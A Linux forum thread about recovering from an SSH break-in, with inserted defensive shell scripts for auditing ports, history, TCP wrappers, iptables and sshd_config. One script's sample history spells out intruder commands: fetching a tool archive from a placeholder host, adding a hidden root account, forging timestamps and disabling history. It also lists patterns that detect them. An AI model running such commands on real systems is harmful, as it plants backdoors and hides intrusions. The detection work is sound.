
I got hacked


Leo

Nice, thanks michaelcole. I think the iptables solution mentioned in the comments was the one I had heard about but I like this a lot, particularly the host lookup part.

 

Leo


I'd normally check using:

 

netstat -tan

 

for any open ports. This normally only listed TCP ports, so use:

 

netstat -na

 

to check for all, including UDP, to see if anything is listening.

 

If you can't get in using your existing root password, you can boot from your Mandrake/Mandriva CD using rescue mode, and then mount and chroot your partitions and then reset the root password that way.

 

If your home directory is separate from the rest of the system, you can do a reinstall without formatting your home partition, thus saving having to move all your data about when installing. Just make sure the format option isn't selected for this partition if you do decide to reinstall.

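The netstat check above is easier to act on if you throw away everything a remote host cannot reach. The script below is an added example, not code from the post: it filters netstat-style output down to listeners bound to non-loopback addresses, then removes the ports you know you run so only the unexplained ones remain. The netstat lines it is fed here are constructed sample data, and the port list passed to unexpected_listeners is an assumed baseline.

```shell
#!/bin/sh
# Added example (not from the original post): filter netstat output down to
# sockets that other hosts can reach. Feed it `netstat -tuln` (listening TCP
# and UDP sockets, numeric) or the `netstat -na` output mentioned above;
# established connections and loopback-only listeners are dropped.

exposed_listeners() {
    # Reads netstat-style lines on stdin, prints "proto port address" for each
    # listener bound to something other than a loopback address.
    awk '
        $1 ~ /^(tcp|tcp6|udp|udp6)$/ {
            # TCP rows carry a State column; keep only LISTEN. UDP has no state.
            if ($1 ~ /^tcp/ && $6 != "LISTEN") next
            local = $4
            n = split(local, part, ":")
            port = part[n]                 # text after the last ":" is the port
            addr = local
            sub(/:[^:]*$/, "", addr)       # ":::80" -> "::", "0.0.0.0:22" -> "0.0.0.0"
            if (addr ~ /^127\./ || addr == "::1") next
            printf "%s %s %s\n", $1, port, addr
        }'
}

unexpected_listeners() {
    # $1 = space-separated ports you know you run (assumed baseline). Reads
    # exposed_listeners output on stdin and prints only the other ports, i.e.
    # the ones that need an explanation.
    awk -v allow="$1" '
        BEGIN { split(allow, a, " "); for (i in a) ok[a[i]] = 1 }
        !($2 in ok)'
}

sample_netstat() {
    # Constructed sample of `netstat -tuln`-style output, not real data.
    cat <<'EOF'
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN
tcp        0      0 0.0.0.0:6667            0.0.0.0:*               LISTEN
tcp6       0      0 :::80                   :::*                    LISTEN
tcp        0      0 192.168.1.5:22          192.168.1.20:4512       ESTABLISHED
udp        0      0 0.0.0.0:68              0.0.0.0:*
udp        0      0 127.0.0.1:323           0.0.0.0:*
EOF
}

# On a live box:  netstat -tuln | exposed_listeners | unexpected_listeners "22 80 68"
# With the constructed sample this leaves one line: tcp 6667 0.0.0.0
sample_netstat | exposed_listeners | unexpected_listeners "22 80 68"
```

Anything this prints is either a service you forgot you installed or something that was installed for you; a listener you cannot name is reason enough to pull the network cable before investigating further.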

OK, so last night I checked .bash_history [ty Tyme] and it seems this chap (I was going to use another word beginning with 'c' but then remembered I am far too polite for that sort of shit) has been a busy little beaver. There were various downloads and installations: mech-[something I can't remember] and some others which, when I googled the filenames, got mentioned in the same pages as root-kits. I also checked netstat and found 4 ports pointing to an IP address similar to the one that originally hacked me.

 

I checked the .bash_history of the root account and could not see any commands that were not mine, but I guess this could have been altered.

 

Long story short I have reformatted all the partitions on the hd and started a reinstall (which I cocked up completely - it was late and I was annoyed). For good measure I reset my modem router to factory settings.

 

Lessons learnt:

use secure passwords

check logs

don't leave sshd running for anyone to use

check .bash_history and netstat before doing anything else.

use secure passwords

 

What have I missed?

Leo

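Reading .bash_history by eye works for one account; the script below is an added example (not from the post) that tags the lines an intruder typically leaves: fetching a file, unpacking and building it, making it executable, running it, changing accounts or startup files, and then hiding the trail. The history it is run over is a constructed sample, and the pattern list is a starting point rather than a complete rootkit signature.

```shell
#!/bin/sh
# Added example (not from the original post): scan a shell history file for
# the sequence an intruder typically leaves behind: fetch, unpack, build,
# chmod, run, then change the system and hide the trail. A clean history
# proves nothing (it is only written when the shell exits and can be edited
# or disabled), but a dirty one is fast to spot.

scan_history() {
    # $1 = history file (e.g. /root/.bash_history). Prints a tag and the
    # matching line for each hit, then a one-line summary.
    awk '
    BEGIN { n = 0 }
    {
        tag = ""
        if      ($0 ~ /(^|[;&| ])(wget|curl|ftp|tftp|lynx|fetch|scp)( |$)/) tag = "download"
        else if ($0 ~ /(^|[;&| ])(tar|gunzip|bunzip2|unzip)( |$)/)          tag = "unpack"
        else if ($0 ~ /(^|[;&| ])(gcc|cc|make|\.\/configure)( |$)/)         tag = "build"
        else if ($0 ~ /chmod +([ugoa]*\+[rw]*x|[0-7]*[1357][0-7]*)( |$)/)   tag = "make-executable"
        else if ($0 ~ /(^|[;&| ])\.\//)                                      tag = "run-local-binary"
        else if ($0 ~ /HISTFILE|HISTSIZE|history -c|\.(bash|sh)_history/)    tag = "history-tampering"
        else if ($0 ~ /useradd|adduser|usermod|passwd|crontab|insmod|modprobe|touch -r|\/etc\/(shadow|sudoers|inittab|rc\.d|ld\.so\.preload|cron)/) tag = "system-change"
        if (tag != "") { printf "%-18s %s\n", tag, $0; n++ }
    }
    END { printf "%d suspicious line(s) of %d\n", n, NR }' "$1"
}

sample_history() {
    # Constructed sample history, not taken from any real machine.
    cat <<'EOF'
ls -la
cd /tmp
wget http://198.51.100.7/tools.tgz
tar xzf tools.tgz
cd tools
chmod +x setup
./setup
cat /etc/passwd
useradd -o -u 0 -g 0 sysadm
touch -r /bin/ls /usr/sbin/sshd
unset HISTFILE
exit
EOF
}

# On a live box:  scan_history /root/.bash_history
# With the constructed sample: 8 suspicious line(s) of 12
f=$(mktemp); sample_history > "$f"; scan_history "$f"; rm -f "$f"
```

The "touch -r" and "unset HISTFILE" tags are the interesting ones: the first copies timestamps from a clean file onto a replaced binary, the second stops the shell writing history at all, which is why an empty or oddly short root history after a break-in is itself a finding.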

Install shorewall or some other firewall to secure your machine, and restrict all ports unless you really need them accessible from the outside. As michaelcole posted, you can use /etc/hosts.allow and /etc/hosts.deny to restrict access to various services, such as sshd. The denyhosts link he posted sounds really good to use in addition to restricting the service to specific users only.

 

I use a hardware firewall, and my router has NAT on it which isn't redirecting any ports to the internal IP address of my machine. Also make sure your router isn't NATing any ports unless you need them accessible.

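The hosts.allow/hosts.deny mechanism has one trap worth seeing in action: a rule in hosts.allow only grants, and when neither file matches, TCP wrappers lets the connection through. The script below is an added example (not from the post or from the tcp_wrappers code) that emulates the decision order on constructed files, first with hosts.allow alone and then with "ALL : ALL" in hosts.deny. It handles ALL, exact addresses, trailing-dot network prefixes and leading-dot domain suffixes; EXCEPT and netmask forms are not implemented. The addresses are sample values.

```shell
#!/bin/sh
# Added example (not from the original post): emulate the TCP wrappers check
# made by services linked against libwrap (check with: ldd "$(which sshd)" |
# grep libwrap). Order is: a match in hosts.allow grants; otherwise a match in
# hosts.deny refuses; otherwise access is GRANTED. That last step is why a
# hosts.allow on its own protects nothing.

match_item() {        # match_item PATTERN VALUE
    case $1 in
        ALL) return 0 ;;
        *.)  case $2 in "$1"*) return 0 ;; esac ;;   # "192.168.1." network prefix
        .*)  case $2 in *"$1") return 0 ;; esac ;;   # ".example.org" domain suffix
        *)   [ "$1" = "$2" ] && return 0 ;;          # exact address or name
    esac
    return 1
}

list_matches() {      # list_matches "a, b c" VALUE  (comma or space separated)
    for item in $(printf '%s' "$1" | tr ',' ' '); do
        match_item "$item" "$2" && return 0
    done
    return 1
}

file_matches() {      # file_matches FILE DAEMON CLIENT
    [ -r "$1" ] || return 1
    while IFS= read -r line || [ -n "$line" ]; do
        line=${line%%#*}                      # strip comments
        case $line in *:*) ;; *) continue ;; esac
        daemons=${line%%:*}
        rest=${line#*:}
        clients=${rest%%:*}                   # drop an optional ": shell_command"
        if list_matches "$daemons" "$2" && list_matches "$clients" "$3"; then
            return 0
        fi
    done < "$1"
    return 1
}

hosts_access() {      # hosts_access ALLOWFILE DENYFILE DAEMON CLIENT -> prints allow|deny
    if file_matches "$1" "$3" "$4"; then echo allow
    elif file_matches "$2" "$3" "$4"; then echo deny
    else echo allow                           # nothing matched: the default is permit
    fi
}

# Demo harness on constructed files. $1 = contents of hosts.deny, $2 = daemon,
# $3 = client address. hosts.allow is fixed: sshd from the LAN and one trusted host.
decide() {
    d=$(mktemp -d)
    printf 'sshd : 192.168.1., 203.0.113.7\n' > "$d/hosts.allow"
    printf '%s\n' "$1" > "$d/hosts.deny"
    hosts_access "$d/hosts.allow" "$d/hosts.deny" "$2" "$3"
    rm -rf "$d"
}

decide ""          sshd 82.124.231.23   # the trap: hosts.allow alone -> allow
decide "ALL : ALL" sshd 82.124.231.23   # fixed: hosts.deny "ALL : ALL" -> deny
decide "ALL : ALL" sshd 192.168.1.10    # and the LAN still gets in -> allow
```

The two-file form is the one to remember: list what may connect in hosts.allow, put "ALL : ALL" in hosts.deny, and test from outside before relying on it. Note that wrappers only see services built with libwrap or started through tcpd; a firewall rule protects everything else.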

Thanks Ianw1974, I had a firewall on the machine last time (just didn't set it up right) and the hosts.allow/hosts.deny stuff does look worthwhile doing.

 

The router has NAT but I don't know what this is or how it works (I will look it up). It also has a firewall on it (which was functioning as set, but I must have set it up badly - more research).

 

On the upside, when this is over I should know more about security.

 

Any more comments/suggestions/further reading will be gratefully accepted

 

Leo


NAT is network address translation. It allows you to use a public IP address assigned by your ISP and then redirect to a port on your privately addressed machines. This negates the need to purchase public IP addresses for all your machines.

 

For example, I could have a public IP of 82.124.231.23, and this would be what I attempt to connect to across the internet. I have port 80 for WWW redirecting to my machine at 192.168.1.2 with the use of NAT. All HTTP requests for the public IP will be redirected to the internal IP address. I could then have port 22 for SSH redirecting to 192.168.1.3, which would be another machine. This means I only need one public IP.

 

My first router only had NAT and no firewall. NAT was enabled and kind of provides basic firewalling. I now use a hardware firewall as well, although if you do have a firewall on your router, do enable it. As long as you're not redirecting ports and are blocking all incoming connections, you should be secure enough. My default firewall rule is block all incoming but allow all outgoing, and that is usually the default on most router/firewalls.

 

If you don't redirect any ports incoming to your machines, you shouldn't get anyone connecting to your machines. Unless of course, they hack your firewall/router and set them up themselves!

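On a Linux box doing the routing, the setup described above (block all incoming, allow all outgoing, forward only port 80 to 192.168.1.2 and port 22 to 192.168.1.3) looks like the ruleset generated below. This is an added example, not the poster's configuration: it assumes eth0 faces the ISP, eth1 faces the LAN, and the legacy iptables syntax with the state match. The point it makes is that a DNAT entry on its own does nothing useful when the FORWARD policy is DROP; each forwarded port needs a matching FORWARD accept, and nothing else should get one. Review the output before loading it with iptables-restore.

```shell
#!/bin/sh
# Added example (not from the original post): emit an iptables-restore ruleset
# for a Linux router with default-deny inbound, allow-all outbound, and an
# explicit DNAT + FORWARD pair for each published service. Interface names and
# addresses are assumptions for the example.

nat_ruleset() {       # nat_ruleset WAN_IF LAN_IF "PORT:HOST PORT:HOST ..."
    wan=$1; lan=$2; forwards=$3
    for spec in $forwards; do                       # validate before printing anything
        port=${spec%%:*}
        case $port in ''|*[!0-9]*) echo "bad forward spec: $spec" >&2; return 1 ;; esac
    done
    echo '*nat'
    echo ':PREROUTING ACCEPT [0:0]'
    echo ':POSTROUTING ACCEPT [0:0]'
    echo ':OUTPUT ACCEPT [0:0]'
    for spec in $forwards; do
        port=${spec%%:*}; host=${spec#*:}
        # rewrite the destination of inbound connections on the public address
        echo "-A PREROUTING -i $wan -p tcp --dport $port -j DNAT --to-destination $host:$port"
    done
    echo "-A POSTROUTING -o $wan -j MASQUERADE"      # LAN machines share the one public IP
    echo COMMIT
    echo '*filter'
    echo ':INPUT DROP [0:0]'                         # nothing reaches the router itself...
    echo ':FORWARD DROP [0:0]'                       # ...or crosses it, unless listed below
    echo ':OUTPUT ACCEPT [0:0]'
    echo '-A INPUT -i lo -j ACCEPT'
    echo '-A INPUT -m state --state ESTABLISHED,RELATED -j ACCEPT'
    echo "-A INPUT -i $lan -j ACCEPT"                # the LAN may administer the router
    echo '-A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT'
    echo "-A FORWARD -i $lan -o $wan -j ACCEPT"      # allow all outgoing
    for spec in $forwards; do
        port=${spec%%:*}; host=${spec#*:}
        # the DNAT above only rewrites; this is what actually lets the packet through
        echo "-A FORWARD -i $wan -o $lan -p tcp -d $host --dport $port -m state --state NEW -j ACCEPT"
    done
    echo COMMIT
}

# Example from the post: web on .2, ssh on .3. Load with:
#   nat_ruleset eth0 eth1 "80:192.168.1.2 22:192.168.1.3" > /etc/sysconfig/iptables
#   iptables-restore < /etc/sysconfig/iptables
nat_ruleset eth0 eth1 "80:192.168.1.2 22:192.168.1.3"
```

Every line in the FORWARD chain that carries "-i eth0" is an exposure decision; if you cannot say which service and which machine it is for, it should not be there. Removing a forward means deleting both the PREROUTING and the FORWARD entry.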

Also enable security notification in the MCC.

 

[Screenshot: MCC36.png]

 

Fill in your username and create a local email account (or fill in your email address, but that is less safe because the email will be sent unencrypted over the internet). You will get two mails every day: a security mail with opened ports, suspicious files and, if you install chkrootkit, a check whether a rootkit is installed; and a diff mail with changes: which ports have opened, which rpm packages got installed.


Some great advice is coming through this thread. Sorry you got hacked Leo, but I think you are doing a great job at bringing this to the attention of others, myself included. I am running a software firewall called smoothwall. I don't know if it really is that good, but I purchased an old desktop PC for £5 UKP and installed this free firewall on that. I have a network of 4 machines, with one of those running a web server, email server and anything open to the internet. The other three machines are run on a secure network that cannot be accessed directly from the internet yet are able to access the internet. It's like having 2 firewalls really, one that stops all incoming traffic and allows outgoing traffic, and another one that allows access to certain services. A web interface gives me administrator access to all the logs, port forwarding and stuff using https. It is a Linux-based OS, so root is only accessible using SSH and is secured by the hosts.allow method. I feel like I'm hiding in my castle but I also feel a little secure in there. I know full well if I peek over the top then I'm likely to get my head blown off, and so it is with computers and firewalls: you can limit the risks, but if one connects to the internet then there is always some risk.

All the best in your restoration and hopefully you won't get hacked in the future.


I plugged a friend's computer, brand new Win XP, into the internet and 20 minutes later it was running like a dog..

 

Found it was fully attacked and was spouting off, attacking other computers on the internet..

 

At least with Linux we have a little longer to put in place the correct patches and updates and set up firewalls.

 

He had no chance; it took me 2 days to get all the patches and config correct, since the viruses and other programs were using up all the bandwidth..

 

This is a lesson to us all to check and recheck..

 

I reconfigured my Tripwire and Checked my firewall settings, just in case..

 

UPDATE - UPDATE - CHECK - CHECK...


Hi,

 

this might be a stupid question but what is ssh and how do I know if it's running on my computer?

 

I've been on the net almost continuously with XP for 3 years and never had any problems, at least nothing my firewall and AV couldn't take care of.

 

I have a hardware firewall/nat router but need to have some ports forwarded, do I need some extra protection?


SSH is a service; it's more secure but works like telnet, allowing you to connect to your machine remotely. Although it's far more than just telnet: you can transfer files using it too.

 

To check, look for port 22 being open on your machine. The command:

 

netstat -tan

 

should list your tcp ports and show port 22 if ssh is running. Or, check:

 

chkconfig --list sshd

 

if it doesn't list anything, sshd isn't installed. If it does, check to see if it says "on" against any of the runlevels.

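Finding sshd running is step one; the question that decides whether a password guess becomes a root shell is what /etc/ssh/sshd_config says. The script below is an added example (not from the post) that reads a config the way sshd does, first occurrence of a directive wins and anything under a Match block is ignored, and reports the settings that are weaker than key-only, non-root logins restricted to named users. It assumes you have already put a public key in ~/.ssh/authorized_keys before turning password authentication off, and the two config files it checks are constructed samples; the login name "leo" is a placeholder.

```shell
#!/bin/sh
# Added example (not from the original post): audit an sshd_config for the
# settings that turn a guessed password into a root shell, and print the
# hardened value beside each weak one. Only the first occurrence of a
# directive counts (that is how sshd reads it); parsing stops at a Match
# block because anything under it is conditional.

audit_sshd_config() {     # audit_sshd_config /etc/ssh/sshd_config
    awk '
    BEGIN {
        # desired values (key-only logins, no direct root, protocol 2 only)
        want["permitrootlogin"] = "no";      want["passwordauthentication"] = "no"
        want["permitemptypasswords"] = "no"; want["protocol"] = "2"
        # what OpenSSH of that era used when the directive was absent
        dflt["permitrootlogin"] = "yes";     dflt["passwordauthentication"] = "yes"
        dflt["permitemptypasswords"] = "no"; dflt["protocol"] = "2,1"
        label["permitrootlogin"] = "PermitRootLogin"
        label["passwordauthentication"] = "PasswordAuthentication"
        label["permitemptypasswords"] = "PermitEmptyPasswords"
        label["protocol"] = "Protocol"
        n = 0
    }
    NF == 0 || $1 ~ /^#/ { next }                # blank lines and comments
    {
        k = tolower($1)                           # keywords are case-insensitive
        if (k == "match") exit                    # END still runs after exit
        if (!(k in seen)) { seen[k] = 1; val[k] = $2 }
    }
    END {
        for (k in want) {
            eff = (k in seen) ? tolower(val[k]) : dflt[k]
            cur = (k in seen) ? val[k] : ("(unset, default " dflt[k] ")")
            if (eff != want[k]) {
                printf "WEAK %s = %s  (set: %s %s)\n", label[k], cur, label[k], want[k]; n++
            }
        }
        if (!("allowusers" in seen) && !("allowgroups" in seen)) {
            print "WEAK no AllowUsers/AllowGroups  (set: AllowUsers <your-login>)"; n++
        }
        printf "%d finding(s)\n", n
    }' "$1"
}

sample_sshd_config_weak() {        # constructed: what a stock file often looks like
    cat <<'EOF'
# constructed sample, not a real host's file
Port 22
Protocol 2,1
PermitRootLogin yes
#PasswordAuthentication yes
X11Forwarding yes
Subsystem sftp /usr/lib/ssh/sftp-server
EOF
}

sample_sshd_config_hardened() {    # constructed: the same file after the fixes
    cat <<'EOF'
Port 22
Protocol 2
PermitRootLogin no
PasswordAuthentication no
PermitEmptyPasswords no
AllowUsers leo
EOF
}

# On a live box:  audit_sshd_config /etc/ssh/sshd_config
# With the weak sample: four WEAK lines, then "4 finding(s)"
f=$(mktemp); sample_sshd_config_weak > "$f"; audit_sshd_config "$f"; rm -f "$f"
```

The commented-out PasswordAuthentication line in the weak sample is the common misreading: a directive behind "#" is not "off", it means the compiled-in default applies, and for password logins that default is yes. After editing, run sshd -t to syntax-check and keep your current session open while you test a fresh login.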
